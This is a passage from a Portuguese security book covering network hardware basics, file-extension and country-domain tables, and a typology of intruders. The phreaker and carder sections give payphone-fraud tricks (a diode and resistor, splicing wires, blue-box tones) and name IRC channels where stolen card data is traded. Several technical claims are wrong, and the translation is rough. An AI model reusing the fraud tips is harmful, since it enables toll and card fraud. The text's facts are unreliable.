com um monitor de rede ou analisador, o jeito é segmentar tráfico de rede para isolar algumas comunicações. Isto é melhor realizada com uma switch, bridge, ou um roteador.
P1.12 Topologias de Circuito privadas São linhas alugadas que podem ser circuitos analógicos ou
digitais dedicados em que você paga uma taxa pelo servoço. Isto significa que se você usa o circuito ou não, você estará pagando uma taxa mensal fixa. Essas linhas São ponto a ponto e sao usados para conectar um local geográfico a outro.
Um T1 é um sinal full--dúplex (cada lado da conexão pode transmitir e pode receber simultaneamente) em cima dos cabos de par trançado. Este par de cabos termina em um receptáculo que se assemelha a um telefone quadrado usado em casas mais velhas. T1s são usados para conexões de ponto a ponto. E a largura da banda em uma T1 está disponível entre 64Kb até 1.544Mb. T1s usam divisão de freqüência para transmitir nos dois pares de fios 24 canais separados. Divisão de freqüência é a partilha da largura da banda disponível baseado em incrementos de freqüência. Isto é extremamente útil como uma T1 é capaz de levar voz e dados ao mesmo tempo.
Temos no Brasil coisas como Speed da telefônica, que traz uma conexão de banda larga bem mais alta e é cobrada uma taxa por seu serviço. Isso é o ADSL.
P1.13 Hardware básicos para Gestão de redes
Terrorismo Tecnológico Aprenda Para Sobreviver
31
Hoje em dia há uma grande quantidade de produtos para
considerar ao planejar sua infra-estrutura de rede. Há dispositivos para tudo dês de conectar sistemas de computador à rede para estender as especificações de uma topologia a controlar tráfico de rede. Às vezes suas escolhas estão limitadas. Por exemplo, para conectar um computador de escritório à rede, você tem que ter uma placa de rede.
Muitos destes dispositivos, quando usado corretamente, também pode ajudar melhorar sua segurança na rede.
P1.14 Repetidores Repetidores são simples amplificadores. Eles são usados em
uma topologia de rede para estender a distância máxima que pode ser feita com cabos. A força do sinal é impulsionada e viaja dentro dos cabos. Um repetidor receberá um sinal digital e os ampliará, e transmitirá para outro cabo fazendo assim uma continuação do sinal.
Um repetidor está como um amplificador de estéreo em aparelhos de som. O ampère leva o sinal que recebe do CD, amplia o sinal, e envia isto a seu aparelho de som.
Repetidores funcionam semelhantemente a um amplificador de radio: eles impulsionam tudo o que simplesmente recebem e enviam isto em sua outra saída (a continuação dos fios). Infelizmente, o sinal que um repetidor recebe poderia ser uma qualidade boa de dados, uma qualidade ruim de dados, ou muito barulhenta. Um repetidor não discerne qualidade de dados; simplesmente olha para cada dos pulsos digitais individuais e os amplifica.
Um repetidor não provê nenhuma segmentação de dados. Todas as comunicações que acontecem em um lado de um repetidor são passadas juntas para o outro lado, se o sistema receptor está no outro fim do cabo ou não.
Terrorismo Tecnológico Aprenda Para Sobreviver
32
P1.15 Hub Hub é provavelmente o mais comum dos hardwares de rede
mais próximos às placas de interface de rede. Fisicamente, elas são caixas de tamanhos variados que têm conectores tipo RJ45 femininos múltiplos. Cada conector é projetado para aceitar um cabo de par trançado equipado com um conector de RJ45 masculino. Este cabo de par trançado é usado para conectar em um único servidor ou estação de trabalho.
Hubs são essencialmente repetidores de multi portas que apóiam cabos de par trançado formando uma topologia de estrela. Cada nodo comunica com o hub que amplia o sinal e as transmite para todas as portas (inclusive para a mesma porta que ele recebeu a transmissão). Como são repetidores, hubs trabalham em nível elétrico. Quando você projetar sua topologia de rede, pense em hubs que provêem zero controle de tráfego como funcionalmente idêntico para repetidores.
P1.16 Bridges É uma ponte se parece muito com um repetidor; é uma caixa
pequena com dois conectores de rede que prendem a duas porções separadas da rede. Uma ponte incorpora a funcionalidade de um repetidor (amplificação notável), mas na verdade olha para as armações de dados que o que é um grande benefício. Uma ponte comum é quase idêntica a um repetidor com exceção do indicador luminosom que piscam sempre que a ponte precisa passar tráfico de um domínio para outro.
As pontes podem usar informação de cabeçalho da rede
TCP/IP para ficar monitorando a fonte e destino MAC para onde se dirige. Monitorando o endereço de fonte, a ponte aprende onde todos os sistemas de rede ficam situados. Constrói uma tabela,
Terrorismo Tecnológico Aprenda Para Sobreviver
33
enquanto listando quais endereços de MAC são diretamente acessíveis por cada uma de suas portas. Usa então essas informações para policiar o tráfego e regular o fluxo de dados na rede.
Um Exemplo de Ponte Olhe para a rede em Figura abaixo. A Betty precisa enviar
dados ao servidor Thoth. Como todo o mundo na rede tem que monitorar a rede, a Betty escuta primeiro as transmissões de outras estações. Se o fio estiver livre, a Betty transmitirá um pacote de dados. A ponte também está assistindo os tráfegos e olhará para o endereço de destino no cabeçalho do pacote de Betty. Porque a ponte é insegura de qual porta o sistema com MAC endereçado 00C08BBE0052 (Thoth) é conectado, amplifica o sinal e retransmite isto fora pa porta B. que até agora a funcionalidade de ponte é bem parecido a de um repetidor. A ponte faz uma pequena leitura, porém, aprendeu aquela Betty é para aportar para porta A e cria uma tabela com o endereço de MAC dela.
Terrorismo Tecnológico Aprenda Para Sobreviver
34
Quando Thoth responde ao pedido de Betty, como mostrado na
próxima figura, a ponte olhará novamente para o endereço de destino no pacote de dados. Porém, desta vez olha em sua tabela, e nota que aquela Betty também é prendido para Aportar o A. que Porque sabe que a Betty pode receber esta informação diretamente, derruba a armação e blocos isto de ser transmitido de Porto o B. A ponte também fará uma entrada de mesa nova para Thoth, enquanto registrando o MAC se dirigem como sendo fora de Porta A.
Terrorismo Tecnológico Aprenda Para Sobreviver
35
O isolamento de tráfego é uma característica poderosa, porque
significa que sistemas em ambos os lados da ponte podem estar levando ao mesmo tempo em conversações, dobrando a largura da banda disponível efetivamente. A ponte assegura que as comunicações em ambos os lados ficam isoladas, como se elas nem fossem mesmo conectadas junto. Porque estações não podem ver as transmissões no outro lado da ponte, eles assumem que a rede está livre e envia os seus dados.
Isto significa que não há nenhum modo para uma estação ter uma colisão fora de seu segmento.
A ponte isola tráfego dentro de cada domínio, não há nenhum modo para sistemas separados colidirem os sinais. O efeito é um dobramento de largura da banda potencial.
Terrorismo Tecnológico Aprenda Para Sobreviver
36
Perceba agora que a rede aumentou e muito a sua segurança, pois agora foi criado uma ponte segura para a comunicação entre dois usuários e os pacotes só estar trafegando por esse espaço que esta em segurança devido a forma em que a ponte esta tratando os pacotes.
P1.17 Switches Switch é quase como uma ponte só que com uma tecnologia
maior. Eles se assemelham a hubs aparência, tendo conectores de RJ45 múltiplos para conectar sistemas de rede. Em vez de ser um simples amplificador como um hub, funciona como um interruptor como se tivesse uma pequena ponte em cada porta. Um interruptor aprenderá endereços de MAC preso a cada uma de
Terrorismo Tecnológico Aprenda Para Sobreviver
37
suas portas e tráfego de rota só será destinados para a porta correta, a qual os pacotes se destinan.
Veja na figura abaixo um ambiente qual cada dispositivo é
conectado a uma porta dedicada. A Switch aprenderá a identificação de MAC de cada estação uma vez uma única transmissão de pacotes acontece (idêntico a uma ponte). Assumindo que isto já aconteceu basta a máquina enviar o pacote na rede e a switch encaminhará os dados para a porta de destino entregando-os em segurança.
Há algumas coisas interessantes sobre esta situação. O primeiro é que a cada lança,mento de pacotes somente a máquina e switch receberam os pacotes. Isto significa que a colisão é limitada as só estes dois dispositivos, por que cada porta do
Terrorismo Tecnológico Aprenda Para Sobreviver
38
interruptor está agindo como uma ponte. O único tráfego visto pelas estações de trabalho e servidores especificamente são somente as que eles mesmos enviaram. Como resultado, todas as três estações verão muito pouco tráfego de rede e poderão transmitir imediatamente e multiplamente.
Dado nosso exemplo, se esta for uma rede de 10Mbps, o processamento efetivo há pouco aumentou por um fator de 3. Isto é porque todos os três jogos de sistemas podem manter as conversações simultaneamente, pois o interruptor os isola de um ao outro. Enquanto ainda tecnicamente for 10Mbps o processamento potencial aumentou para 30Mbps.
Além de desempenho crescente aumentou-se também
segurança. Se qualquer um destes sistemas for feito um acordo, as únicas sessões que podem ser monitoradas são sessões com os que chegaram a um acordo sistema. Por exemplo, se um atacante ganhar acesso ao Servidor 2, ela não poderá monitorar sessões de comunicação com Servidores 1 ou com o Servidor 3, só com o Servidor 2.
Isto é porque monitorando dispositivos podem roubar somente o tráfego que está sendo transmitindo dentro do fluxo daqueles cabos.
Enquanto esta for uma característica de segurança maravilhosa, faz com que o monitoramento de sua rede seja pouco incômodo. Isto é por que muitas switches incluem um porta de monitoramento.
Uma porta de monitoramento simplesmente é uma porta na switch que pode ser configurada para receber uma cópia de todos os dados transmitidos a uma ou mais portas. Por exemplo, você poderia pela porta 10 da switch configurando-a para escutar todo o tráfico da porta 3. Se a porta 3 for um de seus servidores, você poderá analisar todo o tráfico que flui neste sistema.
Mas este também pode ser um problema de segurança potencial. Se um invasor puder ganhar acesso administrativo ao switch (por Telnet, a porta HTTP, SNMP, ou o console), ela teria carta branca para monitorar qualquer sistema conectado. Se o invasor conseguisse acessar Servidor 2 e a própria switch, ele
Terrorismo Tecnológico Aprenda Para Sobreviver
39
estaria agora em uma posição perfeita monitorar todas as comunicações de rede.
Perceba que pontes, switches, e dispositivos de gestão de
redes são projetados para melhorar o desempenho de rede e não para melhorar segurança da rede. Segurança aumentada é há pouco um benefício secundário. Isto significa que eles não receberam o mesmo tipo cuidado, para que no mundo real não causasse problemas.
P1.18 VLAN Tecnologia Switches introduziu uma nova tecnologia de rede que é a Área
Local Virtual (VLAN). Software que corre na switch lhe permite montar parâmetros de conectividade para sistemas conectados através de workgroup (chamado grupos de VLAN). O administrador da switch lhe permite organizar transmissões de portas logicamente de forma que a conectividade se agrupe de acordo com as exigências de cada usuário.
Nomeando todas as portas da switch que conectam os PCs usados pelo pessoal de contabilidade ao mesmo grupo de VLAN, você pode criar uma rede de contabilidade virtual.
Se você tem uma switch de 24 portas e você as divide em três VLANs separado, você tem três switchs de 8 porto cada.
Mas se um invasor puder atacar uma switch que usa VLANs,
ele poderia configurar a conexão dele para monitorar qualquer do outra VLANs no mesmo dispositivo.
Esta pode ser uma coisa extremamente ruim se você tiver uma switch grande que provê conectividade em ambos os lados de um dispositivo de controle de tráfego como em um firewall. Um invasor pode não precisar penetrar em seu firewall ele usará a switch por ser mais fácil.
Terrorismo Tecnológico Aprenda Para Sobreviver
40
P1.19 Roteadores Um roteador é um dispositivo de multi portas que decide como
controlar tráfegos na rede, baseado em protocolo e informação de rede. Entender o que isto significa verdadeiramente, nós teremos que olhar primeiro para o que um protocolo é e como ele trabalha.
Até agora, temos comunicado usando o endereço de Controle de acesso de Mídia nomeado a nossos dispositivos de gestão de redes.
Nossos sistemas usaram este número para contatar outros sistemas e transmitir informação.
O problema com este esquema é que não funciona muito bem. Por exemplo, se você tem 2000 sistemas que precisam comunicar entre si? Você teria 2000 sistemas que brigam um contra o outro para a largura da banda em uma única rede de Ethernet.
P1.20 Protocolos de rede Os mais baixos níveis de um protocolo de rede é um jogo de
regras de comunicação que provêem os meios para transmitir em rede os dados por uma instalação elétrica comum. Isto faz parte de um grupo específico, cada um destes sistemas é nomeado com um endereço de rede de protocolo idêntico.
Endereços de rede são como os de CEP. Assumamos que alguém remeta uma carta e na frente do envelope simplesmente se lê: Para o senhor Leandro, Na rua velha. Se isto acontecer em uma cidade muito pequena, a carta provavelmente chegará (é como se você tivesse usado um endereço de MAC em uma LAN).
Se a carta fosse remetida em uma cidade como São Paulo ou Nova Iorque, o correio não teria nenhuma pista para onde enviar isto.
Sem um CEP, eles não podem nem mesmo tentar encontrar. O CEP provê um modo para especificar a área geral onde esta carta precisa ser entregue.
Terrorismo Tecnológico Aprenda Para Sobreviver
41
O entregador de carta não precisa saber exatamente onde a rua velha fica situada. Ele simplesmente olha para o CEP e o envia para quem é responsável entregar cartas nesta área.
Endereços de rede operam dem um modo semelhante. Um dispositivo atento ao protocolo acrescentará o endereço de rede do dispositivo de destino ao campo de dados. Também registrará seu próprio endereço de rede, no caso de as necessidades de sistema remotas enviem uma resposta.
Isto é onde um roteador entra. Um roteador é um dispositivo atento ao protocolo que mantém uma tabela de todas as redes conhecidas. Usa esta tabela para levar o protocolo ao seu destino final.
Vejamos o exemplo. Digamos que o sistema que B precisa transmitir informação ao
sistema F
Como as máquinas estão fisicamente separadas, pois estão em
redes diferentes ela precisa de alguém que conheça quem é aquela máquina e quem sabe disso é o roteador que contem tabelas com os “CPS” das redes então a máquina B entrega os
Terrorismo Tecnológico Aprenda Para Sobreviver
42
pacotes ao roteador da network 1 que manda ao roteador da network 3 que é a onde a máquina F está.
P1.21 Extensões de arquivos comuns e não tão comuns
.exe é de um arquivo executável assim como .doc é de um
arquivo de texto do Microsoft Word, porém existem alguns arquivos que muitas vezes recebemos via e-mail e não sabemos se pode ser vírus, ou nem mesmo sabemos de qual programa ele pertence a tabela abaixo o ajudara a conhecer um pouco mais a respeito das extensões.
Ext Arquivo do tipo 7le 7th Level 7lp 7th Level 7ls 7th Level aiff áudio ani cursor animado arj ARJ art AOL arquivo gráfico comprimido asf Windows Media asm ASM au áudio avi vídeo bas código fonte de Basic bin binário bmp imagem c Canvas cab FutureSplash cdf IE Channel Definition Format cdr imagem de CorelDraw class arquivo Java class
Terrorismo Tecnológico Aprenda Para Sobreviver
43
cnf E-cash cod FORTRAN/Multiplan/dBASE css cascading style sheet cur cursor Windows dcr Director dir directory/Procom dialing directory doc MS Word dwt DreamWeaver template dxr Director fla Flash ged imagem gif imagem gz arquivo comprimido hdml handheld device markup language hqx Mac BinHex htm html html htm inf OS/2 Setup file ivr image ivs vídeo jar Java archive java Java jpeg imagem jpg imagem js JavaScript key keyboard macro lbi DreamWeaver library item lwp Lotus Word Pro map mapa de imagem mdb Acesso mid MIDI mod música mov QuickTime MooV mp2 mpeg áudio mp3 mpeg áudio mpeg mpeg vídeo mpg mpeg vídeo mtm multi-tracker module
Terrorismo Tecnológico Aprenda Para Sobreviver
44
pas pascal pdf Acrobat Portable Data Format pl Perl ply imagem pps MS PowerPoint slide pub MS Publisher png imagem ppt MS PowerPoint ps PostScript qt QuickTime MooV ra RealAudio ram RealAudio (ou Vídeo) meta-file rm RealMedia rmf áudio rmx RealJukebox rp imagem rpm RealMedia plugin rt RealText rtf Rich Text Format s3m sound scm video sit Arquivo comprimido Mac smi SMIL smil SMIL spl Shockwave/Flash swf Shockwave/Flash tgz g-zipped TAR tif imagem tiff imagem tmp temporário tms Telemate script tsp TrueSpeech txt ASCII texto utf8 MS FrontPage viewlet Viewlet viv vídeo vivo vídeo vox som
Terrorismo Tecnológico Aprenda Para Sobreviver
45
wav som wax Windows Media wma Windows Media wml WML wrk planilha wrl VRML x fonte LEX xls Excel xml extensible markup language zip arquivo comprimido
P1.22 Em qual país este site está hospedado? Você já entrou em um site e não teve a menor noção de onde ele está
hospedado? Isso não vai mais acontecer ao entrar em um site observe o final do endereço e consulte a tabela a seguir ex: www.axcel.com.br o .br quer dizer que está hospedado no Brasil!
A
AD Andorra AE Emirados Árabes Unidos AF Afeganistão AG Antígua e Barbuda AI Anguila AL Albânia AM Armênia AN Antilhas Holandesas AO Angola AQ Antártica
Terrorismo Tecnológico Aprenda Para Sobreviver
46
AR Argentina AS Samoa Americana AT Áustria AU Austrália AW Aruba AZ Azerbaijão
B
BA Bosnia-Herzegovina BB Barbados BD Bangladesh BE Bélgica BF Burkina Fasso BG Bulgária BH Bahrein BI Burundi BJ Benin BM Bermudas BN Brunei BO Bolívia BR Brasil BS Bahamas BT Butão BV Ilha Bouvet BW Botsuana BY Bielorússia BZ Belize
Terrorismo Tecnológico Aprenda Para Sobreviver
47
C
CA Canadá CC Ilhas Keeling (Cocos) CF República Centro-Africana CG Congo CH Suíca CI Costa do Marfim CK Ilhas Cook CL Chile CM Camarões CN China CO Colômbia CR Costa Rica CS Tchecoslováquia CU Cuba CV Cabo Verde CY Chipre CZ República Tcheca
D
DE Alemanha DJ Djibuti DK Dinamarca DM Dominica DO República Dominicana DZ Argélia
Terrorismo Tecnológico Aprenda Para Sobreviver
48
E
EC Equador EE Estônia EG Egito ES Epanha ET Etiópia
F
FI Finlândia FJ Ilhas Fiji FK Ilhas Falkland (Malvinas) FM Micronésia FO Ilhas Faroe FR França FX França (Território Europeu)
G
GA Gabão GB Grã Bretanha (Reino Unido) GD Granada GE Georgia GF Guiana Francesa GH Gana
Terrorismo Tecnológico Aprenda Para Sobreviver
49
GI Gibraltar GL Groenlândia GM Gâmbia GN Guiné GP Guadalupe (Francesa) GQ Guiné Equatorial GR Grécia GT Guatemala GU Guam (EUA) GW Guiné Bissau GY Guiana
H
HK Hong Kong HM Ilhas Heard e Macdonald HN Honduras HR Croácia HT Haiti HU Hungria
I
ID Indonésia IE Irlanda IL Israel IN Índia IQ Iraque
Terrorismo Tecnológico Aprenda Para Sobreviver
50
IR Irã IS Islândia IT Itália
J
JM Jamaica JO Jordão JP Japão
K
KE Quênia KH Cambódia KI Kiribati KM Ilhas Comores KP Coréia do Norte KR Coréia do Sul KW Kuáit KY Ilhas Cayman KZ Cazaquistão
L
LA Laos
Terrorismo Tecnológico Aprenda Para Sobreviver
51
LB Líbano LC Santa Lúcia LI Liechtenstein LK Sri Lanka LR Libéria LS Lesôto LT Lituânia LU Luxemburgo LV Látvia LY Líbia
M
MA Marrocos MC Mônaco MD Moldávia MG Madagascar MH Ilhas Marshall ML Mali MN Mongólia MO Macau MQ Martinica MR Mauritânia MT Malta MU Ilhas Maurício MV Maldivas MW Malaui MX México MY Malásia MZ Moçambique
Terrorismo Tecnológico Aprenda Para Sobreviver
52
N
NA Namíbia NC Nova Caledônia NE Níger NF Ilha Norfolk NG Nigéria NI Nicarágua NL Países Baixos (Holanda) NO Noruega NP Nepal NR Nauru NT Zona Neutra NU Niue NZ Nova Zelândia
O
OM Omã
P
PA Panamá
Terrorismo Tecnológico Aprenda Para Sobreviver
53
PE Peru PF Polinésia PG Papua PH Filipinas PK Paquistão PL Polônia PR Porto Rico PT Portugal PW Palau PY Paraguai
Q
QA Qatar
R
RO Romênia RU Rússia RW Ruanda
S
Terrorismo Tecnológico Aprenda Para Sobreviver
54
SA Arábia Saudita SB Ilhas Salomão SC Seicheles SD Sudão SE Suécia SG Cingapura SH Santa Helena SI Eslovênia SK República Eslovaca SL Sierra Leone SM San Marino SN Senegal SO Somália SR Suriname ST São Tomé e Príncipe SU União Soviética SV El Salvador SY Síria SZ Suazilândia
T
TD Chade TG Togo TH Tailândia TK Toquelau TM Turcomenistão TN Tunísia TO Tonga TP Timor Leste TR Turquia
Terrorismo Tecnológico Aprenda Para Sobreviver
55
TT Trinidad e Tobago TV Tuvalu TW Taiwan TZ Tanzânia
U
UA Ucrânia UG Uganda UK Reino Unido US Estados Unidos UY Uruguai UZ Uzbequistão
V
VA Vaticano VC São Vicente e Granadinas VE Venezuela VG Ilhas Virgens Britânicas VI Ilhas Virgens Americanas VN Vietnã VU Vanuatu
Terrorismo Tecnológico Aprenda Para Sobreviver
56
W
WS Samoa
Y
YE Iêmen YU Iugoslávia
Z
ZA África do Sul ZM Zâmbia ZR Zaire ZW Zimbabue
Terrorismo Tecnológico Aprenda Para Sobreviver
57
Capítulo I Introdução à segurança – Ao entrarmos em um aeroporto,
espera-se toda a segurança que é necessária, já que a própria historia nos vem mostrando que é um assunto delicado e que deve ser abordado. Mas existe o terror tecnológico? Ele nos trará problemas? Quais problemas?
Terrorismo Tecnológico Aprenda Para Sobreviver
58
Parte I
1.1 Estamos totalmente seguros? Com absoluta certeza não! Munidos de um computador e uma
conexão a Internet, pode-se invadir um aeroporto em Nova York, mesmo estando em uma pequena cidade do interior de Minas Gerais no Brasil ou em qualquer lugar do mundo onde se tenha acesso a Internet. E isto pode acontecer em qualquer outro aeroporto existente.
Já ficou comum lermos em jornais sobre algum hacker que tenha invadido sistemas, roubando bancos, ou apagando e lendo dados confidenciais.
E isto pode se estender a uma grande confusão no aeroporto como passageiros com nomes trocados ao embarcar, nomes que não constam na lista, informações nos letreiros erradas, ou na pior das hipóteses, uma invasão no Controle de Trafego Aéreo, que poderia causar a queda de um avião, uma colisão, ou no menos pior o avião acabar alguns kilometros longe do destino final.
E isso pode acontecer facilmente já que em dias nublados ou a noite é apenas por instrumentação que o avião utiliza para se orientar.
Quando um avião esta chegando ao aeroporto ele recebe informações como a de que o avião esta a uma quantidade x de “kilometro” do solo.
Bom imagine que na realidade ele está a 400 metros do solo, mas o seu indicador informou que está a 600 metros. Quando o piloto achar que ainda faltam 200 metros do solo, o avião já estará explodindo e devastando tudo o que há em volta.
Pânico geral. Mas não se deve ter medo, mas sim tomar
certas políticas de seguranças e assim dificultar e proteger todo o sistema computacional, o que é imprescindível.
Terrorismo Tecnológico Aprenda Para Sobreviver
59
Políticas de segurança como usuários domésticos também tem que tomar como, por exemplo, usar o Net Bank na sua casa a vontade, mas mantenha sempre o seu sistema operacional, Service Pack, e o navegador, geralmente o I.E. e o Netscape, sempre atualizados. Evite acessar sua conta de universidades, Cyber Cafés e locais onde muitas pessoas usam o mesmo micro. Soluções simples, mas muito eficazes.
Isto lembra o caso como o da corrida espacial. Quando os EUA gastaram milhões para desenvolver uma caneta, pois as canetas normais não escreviam de cabeça para baixo e com a pouca gravidade. A URSS resolveu o problema usando um lápis.
Há muita espionagem industrial. Experts em informáticas são
contratados para invadir sistemas e descobrir dados confidenciais. Grupos de hacker brasileiros estão cada vez mais “populares”,
já que o Brasil é um dos paises onde mais se têm invasores e menos seguranças, chegando a ponto de empresas como a Nasa proíbe que certas páginas do seu site sejam exibidas para moradores do Brasil, com finalidade da não invasão.
Outro grande problema são com os vírus, que não descobrem nada porém apagam arquivos e geram uma dor de cabeça bem grande para os administradores de rede e todos os usuários.
Mas...
1.2 Quais os motivos que levam este invasor? Terrorismo é o maior problema a ser enfrentado. Fazer uma
confusão nos computadores dos aviões ou do ATC (comando de trafego aéreo). Pode-se também conseguir dados de certas empresas aéreas, seus funcionários e passageiros.
Terrorismo Tecnológico Aprenda Para Sobreviver
60
Todo o sistema aéreo é computadorizado, deixando então uma ampla possibilidade aos terroristas cibernéticos.
Os outros invasores o fazem pelo prazer de dizer que possui um conhecimento maior e se afirmar como mais poderoso.
Claro que há os que querem ganhar dinheiro roubando informações, dados, senhas etc, mas a maioria quer mostrar que manda e tem poder na net. Busca de vingança também é bem grande. E a vontade de apagar sistemas confundir os controladores embaralhar informações e rir do sofrimento do outro.
E hoje o principal medo são os Terroristas, que não se sabe
como, quando e em que lugar eles irão atacar.
1.3 Como é este Hacker? Certamente se você procurar na Internet vai achar muitos sites
que dizem como é esse invasor. É tudo furada. Particularmente já vi quase de tudo, por exemplo, o de um
menino de 14 anos que retirou R$ 4000,00 reais da conta de um vizinho, ou outro que trocou uma foto da capa de um site de jornalismo bem conhecido por uma foto pornográfica e pessoas bem mais velhas enfim não existe um biótipo.
Porém, geralmente são do sexo masculino, quietos, e não são do tipo que dizem: “eu faço...”, eles fazem.
Já, aqueles caras que na sala de aula de um curso ou em uma roda de bate papo falam que fazem isso, invadem aquilo... Esses normalmente nem sabem enzipar um arquivo.
Terrorismo Tecnológico Aprenda Para Sobreviver
61
1.4 Sistema Seguro Vemos hoje em dia muitos administradores colocando um
sistema Unix, e geralmente o Linux como servidor e em alguns casos até como micro clientes, geralmente achando que assim seu sistema estará seguro.
Muito mais inocente é aquele que instala um antivírus ou um firewall e começa a se sentir em uma fortaleza, parece até a historia dos três porquinhos, acontece que nesse ponto (informática e segurança) é como um ladrão, se ele realmente quer roubar uma casa um simples cadeado não vai fazer diferença, pode até atrapalhar um pouco, mas nada que uma serra não resolva.
A questão é que quem cuidará da rede (administrador ou o administrador de segurança) deve se conscientizar e usar uma ampla política de segurança. Que muitas vezes não requer nem muitos gastos, a não ser gasto de tempo, paciência e muito conhecimento.
Daí vale lembrar que alguém que é contratado por pouco dinheiro possivelmente saberá pouco e fará menos ainda.
1.5 O administrador É o principal responsável pela rede. Geralmente quem a
projetou, é quem a administra. Possivelmente ele deve todos os dias checar os logs de erro,
checar os dados, administrar usuários, controlar servidores, fora todos os problemas que acontecem todos os dias em uma rede. Acontece que a grande maioria dos administradores hoje não se preocupa com a segurança como deviam, e é obvio que caso os problemas não sejam corrigidos conforme forem aparecendo logo
Terrorismo Tecnológico Aprenda Para Sobreviver
62
a rede ira parar, não importando se é uma rede feita com fibra óptica, servidores duais com três GB de memória DDR-DIMM. Não importa qual sistema operacional ou antivírus e firewall instalados, a rede vai dar problema!
Tudo tem que ser resolvido rapidamente caso for ficar pensando muito e burocratizando atrapalhara a resolução e assim a rede ficara cada vez mais com problemas. Imagine uma situação de um banco as 11:30 da manha, com filas kilometricas e pronto. O sistema cai. Parece engraçado, mas duvido que alguém já não chegou em uma loja, supermercado, hospital ou em algum lugar que se use a informática e alguém falou essa frase – "desculpe, mas o sistema caiu”.
Não vou dizer que isso não acontece, mas a máquina não erra e sim nós.
1.6 Mentiras? Imaginação? Há uma diferença grande entre os invasores que vemos nos
filmes e os da vida real. Não existe mágica nem efeitos especias, e absolutamente não há nada de espetacular e incrível de se fazer uma invasão em um sistema alheio. Bastam alguns conhecimentos e pronto se o sistema a ser invadido não tem política de segurança qualquer pessoa com um conhecimento mínimo de informática pode conseguir algum resultado. É claro que você não vai invadir uma grande empresa que toma todos os cuidados, mas as informações de seus amigos já é outra historia.
Terrorismo Tecnológico Aprenda Para Sobreviver
63
Parte II
1.7 Os Invasores A definição mais apropriada seria dizer que é um invasor,
qualquer um que entre em um sistema no qual não lhe foi dado à permissão.
Então qualquer um que o fizer será um invasor, mesmo que esse não tenha um grande conhecimento de informática, mas conseguiu ver algo que não lhe foi concebido.
1.7.1 - Lammer Esse é o que mais tem, mas nunca admite ser. O lammer é um
cara que começou a aprender informática e lendo alguns textos já se acha o tal. Ele diz fazer muitas coisas como invadir destruir e faz muita autopropaganda, mas no fim ele mal sabe usar um arj.
1.7.2 - Hackers Esses são muito confundidos, os lammers, sem entender de
nada, (mas dizendo que sabem tudo) se diz ser um hacker. Hackers são pessoas que vivem para a informática, gostam e
querem aprender tudo a seu respeito. Aprendem a invadir destruir e tudo mais, mas não o fazem, pois só tem a curiosidade de aprender e saber das falhas.
Cresce muito o número de empresas que contratam os hackers para defender o seu sistema.
Terrorismo Tecnológico Aprenda Para Sobreviver
64
1.7.3 - Cracker Agora sim é perigoso! Esse tem o prazer em destruir, roubar
informações para o seu uso e para vendê-la, ou somente ter a diversão em ver tudo parar de funcionar e dizer que foi ele quem o fez.
Constrói vírus, usa trojans, enfim o que há de ruim está neste ser.
Muitas vezes eles querem se vingar de algum administrador, operador de sistema ou de algum canal de IRC, enfim eles usam o seu conhecimento para benefícios pessoais.
Esse é muito contratado por algumas empresas para fazer espionagem industrial.
1.7.4 - Phreakers São experts em telefonia, querem entender como funcionam
todo o processo telefonico e é claro tirar vantagem disto. Geralmente utilizam programas e dispositivos que assim podem
utilizar o telefone gratuitamente. Coisas que chegam a ser muito fácil de fazer, e realmente funcionam.
Pioneiro nisso foi o Capitão Crunch, que com um pequeno apito encontrado em pacotes de cereais percebeu que tinha a mesma freqüência usada pelos orelhões da AT&T, fazendo com que discassem de graça. Coisa parecida com o que aconteceu com os orelhões na Telefonia no Brasil que a partir dos barulhos feitos pelo celular completavam as ligações. O problema foi resolvido tendo que trocar algumas placas destes orelhões.
Muito utilizado é o blue box, um programa que gera tons de 2600db pela placa de som, fazendo com que a companhia telefônica não reconheça a chamada e então não será cobrada a ligação. Já o Black Box funciona para ser usado nos telefones particulares (domésticos).
Já os que preferem a parte física da coisa podem usar um diodo e um resistor nos orelhões, pois funciona mais ou menos
Terrorismo Tecnológico Aprenda Para Sobreviver
65
assim: Quando você coloca o cartão telefônico ele tem uma certa quantidade de fusíveis quando se completa uma chamada é emitido um certo “choque” e então queima um desses fusíveis e lá se vai uma unidade do cartão.
Basta que esse fusível não se queime! A prática do diodo e resistor simplesmente engana o orelhão. Outra coisa praticada por esses invasores são o de cortar os dois fios atrás do orelhão (naquela torre ou perto da parede) e ligá-lo a um telefone comum assim funcionara como um telefone doméstico. As companhias telefônicas devem tomar mais cuidado.
Isso tudo é crime, porém é muito mais muito difícil esses Phreakers serem pegos, e nossas leis estão um pouco para não dizer muito atrazada.
Há também funcionarios da própria empresa telefonica que instala telefones clandestinos, geralmente em nome de defuntos ou laranjas, essa prática vem cescendo muito, principalmente pela má contratação, pessima qualidade e falta de treinamento dos seus funcionarios.
No capítulo 5 este assunto é tratado de uma forma mais prática.
1.7.5 - Funcionários Esse é o principal problema. Geralmente 70% dos problemas
ocorridos estão aqui. Funcionários mal remunerados ou subordinados querem
vingança contra a empresa ou seus chefes. Aí começa o problema, pois o invasor esta dentro da própria empresa e possui as senhas e o acesso aos dados.
Então basta entrar lá e os apagar, bagunçar os dados ou até transferir algum dinheiro para a Suíça. Engana-se quem acha que isso é um exagero, pois é o que mais acontece.
Muitas vezes estão comprometendo a rede, como em instalar joguinhos ou programas de Chat que podem ter trojans e colocar a
Terrorismo Tecnológico Aprenda Para Sobreviver
66
rede em riscos. Ou até para saber o telefone da “gostosa” do outro setor.
Firewall é ineficaz contra eles, pois estão dentro da rede e com certeza os administradores não estarão preocupados e nem preparados para enfrentá-los.
1.7.6 - Terroristas Este é um campo que os terroristas estão avançando em largos
passos, e é muito mais fácil causar grandes transtornos e até desastres aéreos via a informática do que a via física, já que o contato não é mais direto, mas sim via teclado.
1.7.7 Carders
È um pouco difícil para que um hacker consiga decodificar os
números dos cartões, mas isso não impede que se ele roube as informações (banco de dados) no servidor da página da prestadora dos cartões assim sendo ele conseguira as informações dos clientes.
Os não tão experts em invasões simplesmente ganham essas informações!
No IRC existem canais específicos dos carders como no servidor /server irc.cris.com nos canais #carder, #card, #carding
Essas informações são trocadas, pois assim fica muita mais difícil de se descobrir que esta usando o cartão, pois muita gente de muitos lugares diferentes o utiliza e assim é difícil saber quem realmente o roubou.
Assim o carder sai comprando, mas quando ele preenche os
dados em páginas de cadastro, seu endereço IP é rastreado pela página e salvo em um bando de dados, para que este possa ser localizado, porém se usar os recursos de Anonimidade assim não será pego.
Geralmente usam os cartões para acessar páginas e registrar softwares
Terrorismo Tecnológico Aprenda Para Sobreviver
67
Geralmente são usados cartões de estrangeiros já que o limite é maior.
